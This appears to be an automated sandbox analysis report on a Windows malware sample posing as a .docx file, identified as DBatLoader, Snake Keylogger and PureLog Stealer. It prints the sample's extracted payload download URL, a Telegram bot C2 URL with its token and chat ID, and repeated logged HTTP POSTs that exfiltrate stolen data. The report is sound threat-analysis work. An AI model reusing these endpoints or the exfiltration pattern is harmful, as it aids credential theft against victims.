Windows Analysis Report
D.G Governor Istek,Docx.exe

Overview

General Information

Sample name: D.G Governor Istek,Docx.exe
Analysis ID: 1577649
MD5: 7d212d2dab091bec36a906828d270c65
SHA1: 4d251936d754c47ee58e3913a99e2659e731ac98
SHA256: 4390ad0a5bd9184058cc6e2fbe64f896f71b0f0e95c27d8769837c6f979b11db
Tags: exe, user-Racco42
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • D.G Governor Istek,Docx.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe" MD5: 7D212D2DAB091BEC36A906828D270C65)
    • cmd.exe (PID: 2140 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 6656 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cneehezx.PIF (PID: 3128 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 7D212D2DAB091BEC36A906828D270C65)
    • cmd.exe (PID: 6672 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 432 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cneehezx.PIF (PID: 5720 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 7D212D2DAB091BEC36A906828D270C65)
    • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 2140 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DBatLoader | This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}
{"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x6a2ab:$a1: get_encryptedPassword
    • 0x6a27f:$a2: get_encryptedUsername
    • 0x6a343:$a3: get_timePasswordChanged
    • 0x6a25b:$a4: get_passwordField
    • 0x6a2c1:$a5: set_encryptedPassword
    • 0x6a08e:$a7: get_logins
    • 0x667cc:$a10: KeyLoggerEventArgs
    • 0x6679b:$a11: KeyLoggerEventArgsEventHandler
    • 0x6a162:$a13: _encryptedPassword
    00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        4.2.xzeheenC.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        13.1.xzeheenC.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        13.2.xzeheenC.pif.31d76478.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          13.2.xzeheenC.pif.31d76478.5.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x26c15:$a1: get_encryptedPassword
          • 0x26be9:$a2: get_encryptedUsername
          • 0x26cad:$a3: get_timePasswordChanged
          • 0x26bc5:$a4: get_passwordField
          • 0x26c2b:$a5: set_encryptedPassword
          • 0x269f8:$a7: get_logins
          • 0x23136:$a10: KeyLoggerEventArgs
          • 0x23105:$a11: KeyLoggerEventArgsEventHandler
          • 0x26acc:$a13: _encryptedPassword
          13.2.xzeheenC.pif.31d76478.5.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x2545d:$s1: UnHook
          • 0x253f9:$s2: SetHook
          • 0x25432:$s3: CallNextHook
          • 0x253c1:$s4: _hook

          System Summary

          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xzeheenC.pif, NewProcessName: C:\Users\Public\Libraries\xzeheenC.pif, OriginalFileName: C:\Users\Public\Libraries\xzeheenC.pif, ParentCommandLine: "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe", ParentImage: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ParentProcessId: 1560, ParentProcessName: D.G Governor Istek,Docx.exe, ProcessCommandLine: C:\Users\Public\Libraries\xzeheenC.pif, ProcessId: 6656, ProcessName: xzeheenC.pif
          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetFilename: C:\Windows \SysWOW64\svchost.exe
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Cneehezx.PIF" , ParentImage: C:\Users\Public\Libraries\Cneehezx.PIF, ParentProcessId: 3128, ParentProcessName: Cneehezx.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6672, ProcessName: cmd.exe
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.247.73, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\xzeheenC.pif, Initiated: true, ProcessId: 6656, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49731
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xzeheenC.pif, NewProcessName: C:\Users\Public\Libraries\xzeheenC.pif, OriginalFileName: C:\Users\Public\Libraries\xzeheenC.pif, ParentCommandLine: "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe", ParentImage: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ParentProcessId: 1560, ParentProcessName: D.G Governor Istek,Docx.exe, ProcessCommandLine: C:\Users\Public\Libraries\xzeheenC.pif, ProcessId: 6656, ProcessName: xzeheenC.pif
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-12-18T16:16:41.243953+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 185.166.143.49 | 443 | TCP
          2024-12-18T16:16:43.767945+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 52.217.32.148 | 443 | TCP

          AV Detection

          Source: D.G Governor Istek,Docx.exeAvira: detected
          Source: C:\Users\Public\Libraries\Cneehezx.PIFAvira: detection malicious, Label: HEUR/AGEN.1326111
          Source: D.G Governor Istek,Docx.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}
          Source: xzeheenC.pif.6656.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
          Source: C:\Users\Public\Libraries\Cneehezx.PIFReversingLabs: Detection: 52%
          Source: D.G Governor Istek,Docx.exeReversingLabs: Detection: 52%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Compliance

          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 4.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 9.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 13.2.xzeheenC.pif.400000.0.unpack
          Source: D.G Governor Istek,Docx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.217.32.148:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49799 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50080 version: TLS 1.2
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: xzeheenC.pif, 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218B2000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218E1000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.0000000000773000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.000000000084F000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.0000000000826000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_029C58B4

          Networking

          Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49782 -> 149.154.167.220:443
          Source: Malware configuration extractor URLs: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj
          Source: unknown DNS query: name: api.telegram.org
          Source: Yara match File source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029DE2F8 InternetCheckConnectionA, 0_2_029DE2F8
          Source: global traffic HTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1f4d1c06ddc3 Host: api.telegram.org Content-Length: 535 Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4d2162bfebHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4d27f0447eHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4d24e5b12fHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f7b1dfba8e0Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1facead84021Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4d2fc2fa98Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2000757d4a82Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f6bdc044996Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4d324b9521Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd203ec07e1085Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1fab8db33d56Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f7c87e875f8Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2056f7803414Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f9415ada89aHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1fc2f018f4d8Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20e90cf9d34fHost: api.telegram.orgContent-Length: 535
